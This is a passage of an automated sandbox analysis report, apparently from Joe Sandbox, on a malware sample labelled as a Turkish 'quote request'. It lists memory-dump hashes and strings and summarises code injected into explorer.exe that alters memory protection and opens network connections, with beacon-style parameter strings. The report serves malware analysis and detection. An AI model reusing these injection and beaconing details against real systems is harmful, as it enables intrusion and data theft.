                                                                                                              • Opcode Fuzzy Hash: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                                                                                                              • Instruction Fuzzy Hash: 40D01236100289EFCB05EF41C890D9A772AFBD8710F108019FD19076108A35ED62DA50
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
                                                                                                              • Instruction ID: 1cc7f594c35ea8c8b20dc11cda417b8894c0cc7a25d946734e0989fbe502600d
                                                                                                              • Opcode Fuzzy Hash: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
                                                                                                              • Instruction Fuzzy Hash: ECC00179601A828BCF1ADB2AD294B4977F4FB44780F1508E0E8468BB22E724E802CA10
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 7aa7368517afc0b83022106aa1a06886c74e1e78cc11a7d763f1a3950393a62d
                                                                                                              • Instruction ID: a123accae5727be1f6d7ebb800a4d5f790366d4059b48756f523cc70b7f38bbb
                                                                                                              • Opcode Fuzzy Hash: 7aa7368517afc0b83022106aa1a06886c74e1e78cc11a7d763f1a3950393a62d
                                                                                                              • Instruction Fuzzy Hash: BC900232605804129644715848845464005A7E1301B55C061E0428555CCB188A575365
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 66fa8ed99d2940ded20c5092fab24d5dcc60a3991373c936af315a072d15aa2a
                                                                                                              • Instruction ID: fa151b64daef28b564b763e07b61efbd4f27f2b908a0bd7006a9a610f4ed8df8
                                                                                                              • Opcode Fuzzy Hash: 66fa8ed99d2940ded20c5092fab24d5dcc60a3991373c936af315a072d15aa2a
                                                                                                              • Instruction Fuzzy Hash: 51900262601504424644715848044066005A7E2301395C165A0558561CC71C8956936D
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 557ba6ea425347544d45a30991f7d4e9069a956743373f5faec69b971373e02e
                                                                                                              • Instruction ID: f9a6888a509798d4472ad5b40a4f0b74e678e1cd449868a7ad399a16efdc6f9c
                                                                                                              • Opcode Fuzzy Hash: 557ba6ea425347544d45a30991f7d4e9069a956743373f5faec69b971373e02e
                                                                                                              • Instruction Fuzzy Hash: F690023260540C02D65471584414746000597D1301F55C061A0028655DC7598B5677A5
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 0d252c1533a247a80722cd80a3d32cbc2feee99258ecd5bbfbde7a120592347b
                                                                                                              • Instruction ID: f1919efc6f8207adb8e50e79f907eab9e2ac659cce0d5c429f54ac982e2bb8cc
                                                                                                              • Opcode Fuzzy Hash: 0d252c1533a247a80722cd80a3d32cbc2feee99258ecd5bbfbde7a120592347b
                                                                                                              • Instruction Fuzzy Hash: 3B90023220140C02D60871584804686000597D1301F55C061A6028656ED76989927235
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 28689093e386552bca89242f8c0c9ddb0866c2d87f5e529b17c7a41310b0d816
                                                                                                              • Instruction ID: 16d7ef5396e3868c16320a4aafa88993aa4a2bb111898d5767bc52ac35e2189e
                                                                                                              • Opcode Fuzzy Hash: 28689093e386552bca89242f8c0c9ddb0866c2d87f5e529b17c7a41310b0d816
                                                                                                              • Instruction Fuzzy Hash: 8790023220544C42D64471584404A46001597D1305F55C061A0068695DD7298E56B765
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 9ce19acf662e55cb8715bc6ab89b55a648688cf504b90105fcb71454f7e2b3b9
                                                                                                              • Instruction ID: afa0ec5593bdbe4a48c4aa8facbbfe7787b49884173934731df227155555ed34
                                                                                                              • Opcode Fuzzy Hash: 9ce19acf662e55cb8715bc6ab89b55a648688cf504b90105fcb71454f7e2b3b9
                                                                                                              • Instruction Fuzzy Hash: B99002A2201544924A04B2588404B0A450597E1201B55C066E1058561CC62989529239
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: dc1f4c5b5b82f1c9c8afb01f26bd31e1864a6cb4fe733cd49d00cb428453492f
                                                                                                              • Instruction ID: b268de17fadd038b5712f429b9a0f63af9b6452d57f4aaade7d7ec3b8b5c0a45
                                                                                                              • Opcode Fuzzy Hash: dc1f4c5b5b82f1c9c8afb01f26bd31e1864a6cb4fe733cd49d00cb428453492f
                                                                                                              • Instruction Fuzzy Hash: DA900226221404020649B558060450B0445A7D7351395C065F141A591CC72589665325
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 17d3342950ab1281c6a4262008290c26ab76f954446c477ea761cd263f10cc05
                                                                                                              • Instruction ID: f54c0e5dc059cee4d71352f6637a3623c79f205f21a529bec0a57de7686573a9
                                                                                                              • Opcode Fuzzy Hash: 17d3342950ab1281c6a4262008290c26ab76f954446c477ea761cd263f10cc05
                                                                                                              • Instruction Fuzzy Hash: 2290023224140802D645715844046060009A7D1241F95C062A0428555EC7598B57AB65
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: f7e31ad423f318432e36e0e53502c480cfba2160641dc051168c6ca8130c9318
                                                                                                              • Instruction ID: b898bff43b51415f9f9982c837427bd0ea0ee42f4d3768eabda89883537a7455
                                                                                                              • Opcode Fuzzy Hash: f7e31ad423f318432e36e0e53502c480cfba2160641dc051168c6ca8130c9318
                                                                                                              • Instruction Fuzzy Hash: 2490022220544842D60475585408A06000597D1205F55D061A1068596DC7398952A235
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 0c0d6db14065e52c755447fe5641aa6ac24cc3b13c7fb8134cdd3bf9739beb0f
                                                                                                              • Instruction ID: 49800dabdf4ece57de218715155e40a58f18b46dd9283453be8b490e8a47eb1d
                                                                                                              • Opcode Fuzzy Hash: 0c0d6db14065e52c755447fe5641aa6ac24cc3b13c7fb8134cdd3bf9739beb0f
                                                                                                              • Instruction Fuzzy Hash: CA90023220140803D60471585508707000597D1201F55D461A0428559DD75A89526225
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 9fc8d6b1e4e04e2276385bc8f57f1b82283b79db2c1046854568a6ce1026e147
                                                                                                              • Instruction ID: b43b46b2030e8048cbfc6a1b258925677d16c14d892337b2439ad5935eb7b945
                                                                                                              • Opcode Fuzzy Hash: 9fc8d6b1e4e04e2276385bc8f57f1b82283b79db2c1046854568a6ce1026e147
                                                                                                              • Instruction Fuzzy Hash: B690022260540802D64471585418706001597D1201F55D061A0028555DC75D8B5667A5
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 93b052ea574995bab3b65bb38f035ae786edcb288de666afed7e7da2184af93f
                                                                                                              • Instruction ID: c70b0875f9061ac3c0ef1590c595868545d0d3ab5bdf004908c4d7c79b892760
                                                                                                              • Opcode Fuzzy Hash: 93b052ea574995bab3b65bb38f035ae786edcb288de666afed7e7da2184af93f
                                                                                                              • Instruction Fuzzy Hash: E090023220140C42D60471584404B46000597E1301F55C066A0128655DC719C9527625
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: bb809729cab9902293dcd684eaf025f9b2228a45020d98a5e5ceb25e610de742
                                                                                                              • Instruction ID: 73f7c2fe423faedcb2089dcdfd1e0c7ae573c875183ba8899ac992939ed6cd7f
                                                                                                              • Opcode Fuzzy Hash: bb809729cab9902293dcd684eaf025f9b2228a45020d98a5e5ceb25e610de742
                                                                                                              • Instruction Fuzzy Hash: 6A90023220180802D60471584808747000597D1302F55C061A5168556EC769C9926635
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 8bf4d50e2dea6ddea99e27f0f2badbe5ca2607538c06c354ab925144c1b71707
                                                                                                              • Instruction ID: fdbfe55ddd655f5d18f915c1aee896d62e2629b55359c27f8d7ef98d96f50de6
                                                                                                              • Opcode Fuzzy Hash: 8bf4d50e2dea6ddea99e27f0f2badbe5ca2607538c06c354ab925144c1b71707
                                                                                                              • Instruction Fuzzy Hash: C590026221140442D60871584404706004597E2201F55C062A2158555CC62D8D625229
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: eef8e39ca94e98e2651d75c58e2226f1ee9a5528a376bf46fa80846997e67c50
                                                                                                              • Instruction ID: 5e36b44979672f652aae7e04cddbdc7d2c986114167944aa7d32b0643ff9463f
                                                                                                              • Opcode Fuzzy Hash: eef8e39ca94e98e2651d75c58e2226f1ee9a5528a376bf46fa80846997e67c50
                                                                                                              • Instruction Fuzzy Hash: 8990026220180803D64475584804607000597D1302F55C061A2068556ECB2D8D526239
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 49bcac29c32f48e0f81eb941d6cd3e38b335708628e07b39b0d27258a5a83524
                                                                                                              • Instruction ID: 826e1e8a09850c8080c0470245e1690a3a1ad8d16ca9dce2786d7f329de21c75
                                                                                                              • Opcode Fuzzy Hash: 49bcac29c32f48e0f81eb941d6cd3e38b335708628e07b39b0d27258a5a83524
                                                                                                              • Instruction Fuzzy Hash: B490022230140802D606715844146060009D7D2345F95C062E1428556DC7298A53A236
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 9439bcd198ccbcce0ba64a212afc966fd63a3e56db4884cc0ca105e7ccca72af
                                                                                                              • Instruction ID: 45af8a84fd7accb87c3feb268d79b1d418eead679fd2f496f9ef2b01568652ac
                                                                                                              • Opcode Fuzzy Hash: 9439bcd198ccbcce0ba64a212afc966fd63a3e56db4884cc0ca105e7ccca72af
                                                                                                              • Instruction Fuzzy Hash: 2D90022224140C02D644715884147070006D7D1601F55C061A0028555DC71A8A6667B5
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 06693689eb249ab6eda7929caffd1ff78078fe8df89ca9d5aff1262c7babf508
                                                                                                              • Instruction ID: 0007cec48445b30afe833436a371d83da2bbd8fda9ab22c98702d9ab3c0b238e
                                                                                                              • Opcode Fuzzy Hash: 06693689eb249ab6eda7929caffd1ff78078fe8df89ca9d5aff1262c7babf508
                                                                                                              • Instruction Fuzzy Hash: D590022220184842D64472584804B0F410597E2202F95C069A415A555CCA1989565725
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: c46daf21a2e93ed8c440edff6cab66d579a105b8f38e7494c0a3d1f07b9a700d
                                                                                                              • Instruction ID: 4ef95940551b98f1d88b2abaf3250580e8d063c8b85b4d1bd536160be9219ec3
                                                                                                              • Opcode Fuzzy Hash: c46daf21a2e93ed8c440edff6cab66d579a105b8f38e7494c0a3d1f07b9a700d
                                                                                                              • Instruction Fuzzy Hash: 9090023260550802D60471584514706100597D1201F65C461A0428569DC7998A5266A6
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 833993e661f2bac4be29e464370a6790d31996b85d55d6f7190336b83deeb5da
                                                                                                              • Instruction ID: 6ce5f17b68cdc82df8b690cc821035960fa4197a538b848b62d70c82ed572fbe
                                                                                                              • Opcode Fuzzy Hash: 833993e661f2bac4be29e464370a6790d31996b85d55d6f7190336b83deeb5da
                                                                                                              • Instruction Fuzzy Hash: 7190022224545502D654715C44046164005B7E1201F55C071A0818595DC65989566325
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 0cf32750b95c5911a051b9b8e536b344d9d49fc358d164e4fee6f6032efa7131
                                                                                                              • Instruction ID: 2c5d138eac5623910b2ec563d9bbd2cbb7c6182fbcd3fced6167bb39e9812406
                                                                                                              • Opcode Fuzzy Hash: 0cf32750b95c5911a051b9b8e536b344d9d49fc358d164e4fee6f6032efa7131
                                                                                                              • Instruction Fuzzy Hash: 7C900232202405429A4472585804A4E410597E2302B95D465A0019555CCA1889625325
Memory Dump Source
• Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
Memory Dump Source
• Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
Memory Dump Source
• Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
Similarity
• API ID: ___swprintf_l
• String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
• API String ID: 48624451-2108815105
Memory Dump Source
• Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
Similarity
• API ID: ___swprintf_l
• String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
• API String ID: 48624451-2108815105
Strings
• Execute=1, xrefs: 01BB4713
• CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 01BB4655
• CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 01BB4725
• CLIENT(ntdll): Processing section info %ws..., xrefs: 01BB4787
• CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 01BB4742
• CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 01BB46FC
• ExecuteOptions, xrefs: 01BB46A0
Memory Dump Source
• Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
Similarity
• API ID:
• String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
• API String ID: 0-484625025
Memory Dump Source
• Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
Similarity
• API ID: __aulldvrm
• String ID: +$-$0$0
• API String ID: 1302938615-699404926
Memory Dump Source
• Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
Similarity
• API ID: ___swprintf_l
• String ID: %%%u$[$]:%u
• API String ID: 48624451-2819853543
Strings
• RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 01BB02E7
• RTL: Re-Waiting, xrefs: 01BB031E
• RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 01BB02BD
Memory Dump Source
• Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
Similarity
• API ID:
• String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
• API String ID: 0-2474120054
Strings
• RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 01BB7B7F
• RTL: Re-Waiting, xrefs: 01BB7BAC
• RTL: Resource at %p, xrefs: 01BB7B8E
Memory Dump Source
• Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
Similarity
• API ID:
• String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
• API String ID: 0-871070163
APIs
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01BB728C
Strings
• RTL: Re-Waiting, xrefs: 01BB72C1
• RTL: Resource at %p, xrefs: 01BB72A3
• RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 01BB7294
Memory Dump Source
• Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
Similarity
• API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
• String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
• API String ID: 885266447-605551621
Memory Dump Source
• Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
Similarity
• API ID: ___swprintf_l
• String ID: %%%u$]:%u
• API String ID: 48624451-3050659472
Memory Dump Source
• Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
Similarity
• API ID: __aulldvrm
• String ID: +$-
• API String ID: 1302938615-2137968064
Memory Dump Source
• Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
Similarity
• API ID:
• String ID: $$@
• API String ID: 0-1194432280
APIs
• @_EH4_CallFilterFunc@8.LIBCMT ref: 01BCCFBD
Memory Dump Source
• Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
Similarity
• API ID: CallFilterFunc@8
• String ID: @$@4Qw@4Qw
• API String ID: 4062629308-2383119779
                                                                                                              • Opcode ID: 7bf237d63894e1c72b5ad1957c6e758dfae9b24799dfeb0ce27840300ce5737d
                                                                                                              • Instruction ID: d3e7e2be3a05957abc829cfb1f439477ef0f2b5ee75f71f2a87f47d3254a8606
                                                                                                              • Opcode Fuzzy Hash: 7bf237d63894e1c72b5ad1957c6e758dfae9b24799dfeb0ce27840300ce5737d
                                                                                                              • Instruction Fuzzy Hash: 4A41BF75900255DFCB29EFA9C840AADBBB8FF59B40F0041BEE905DB254E734C901CBA4

                                                                                                              Execution Graph

                                                                                                              Execution Coverage:2.3%
                                                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                                                              Signature Coverage:4.7%
                                                                                                              Total number of Nodes:444
                                                                                                              Total number of Limit Nodes:16
                                                                                                              [Execution graph rendered as an image in the original report; the node and edge listing is omitted here. API-calling nodes in the graph (addresses as labelled, all inside the 0DDB0000 region mapped into explorer.exe): deade45 NtProtectVirtualMemory, reached through dea18f2/deabab2 from the dea4ee2, dea4fc2, dea5102, dea52f2 and dea5712 routines; deac410 NtCreateFile via deac232; dea7995 ObtainUserAgentString via dea78c2/dea8382; dea3cb5 CreateMutexExW; dea144d CreateThread; dea1328 SleepEx. The network routine deacf82 runs dea960a socket, dead117 getaddrinfo, dea9788 connect, dea9705 send, then dead7f4 setsockopt and recv.]

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              [Control-flow graph of deacf82 to dead920 (explorer.exe, region 0DDB0000), rendered as an image in the original report; basic-block and edge listing omitted. Path of note: call dea95b2 (socket) at dead068, getaddrinfo at dead117, call dea9732 (connect) at dead191, call dea96b2 (send) at dead6ff, then setsockopt and recv at dead7f4; helper calls to deac942, dea9552, deadd62, deadd92, deaa042, deaa482, dea9e72, deae002, deae262, dea9382 and dea97b2 sit between them.]
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.2823254798.000000000DDB0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0DDB0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_ddb0000_explorer.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: getaddrinforecvsetsockopt
                                                                                                              • String ID: Co$&br=$&sql$&un=$: cl$GET $dat=$nnec$ose$tion
                                                                                                              • API String ID: 1564272048-1117930895
                                                                                                              • Opcode ID: 5de8858bceb6b52e8c11e308410fa1d1098ae4878da76a5e8b5a3db0c78a0a43
